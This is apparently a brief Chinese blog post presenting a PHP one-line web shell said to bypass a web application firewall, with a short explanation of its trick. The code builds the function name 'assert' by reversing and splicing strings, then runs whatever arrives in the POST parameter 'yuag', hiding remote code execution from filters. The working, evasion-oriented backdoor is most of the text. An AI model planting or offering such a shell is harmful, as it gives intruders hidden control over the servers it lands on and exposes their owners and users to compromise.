最新过某waf一句话
这个是我在互联网上看见的,其实和回调函数差不多,拿来分析一下吧。
error_reporting(0);
$b="zxczxczxczxczxcxzczx";
function yuag_array($b,$c){
$b=strrev($b);
array_map(substr_replace($b, 'ss', 1, 0),array($c));
}
yuag_array("trea",$_POST['yuag']);
?>
先是构造了一个函数yuag_array,然后传入了两个参数,经过反转和替换字符串构造出assert。
这样最后执行的就是:
array_map(assert,array($_POST['yuag']));
这里就不再做详细介绍了。
发表评论